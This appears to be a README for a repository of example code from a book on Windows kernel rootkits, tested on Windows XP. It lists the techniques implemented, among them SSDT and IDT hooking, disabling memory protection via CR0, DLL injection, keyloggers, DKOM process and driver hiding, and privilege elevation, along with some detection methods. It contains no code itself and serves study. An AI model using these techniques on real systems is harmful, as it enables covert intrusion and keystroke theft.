Still Work-in-progress..
I have arranged the code according to its order in the book.
I tested most of the code on Windows XP SP0 (no service packs installed) in a VM.
I haven't included the code for the networking from Chapter 9: Covert Channels (using TDI and NDIS).
The code includes the following:
- Basic driver.
- Creating a file handle and a symlink
- Loading a driver using the quick and dirty way
- Loading a driver the correct way (using Service Manager)
- Decompress a SYS file from the rsrc section
- Parsing the IDT table
- CR0-trick to disable memory protection
- Injecting a DLL using remote threads
- Hooking SSDT (using it to hide processes' names)
- Hooking the IDT
- SYSENTER hook
- Hooking the IRP major-functions table
- Hybrid hooking approach
- Detour patching
- Jump templates
- Sample keylogger (as a Layered driver)
- Grabbing OS version from the Registry
- Grabbing OS version from Kernel-Mode (OSVERSIONINFO structure)
- Hiding devices/drivers (using DKOM)
- Privilege elevation (using DKOM)
- Playing with the Keyboard LEDs (accessing the hardware directly)
- Keysniffer (by accessing the hardware directly)
23-27. RootKit Detection methods.
Lessons were put in order ( + some added code) by: 0xbahaa
Forked from the original mirror by: fdiskyou
Links to the book: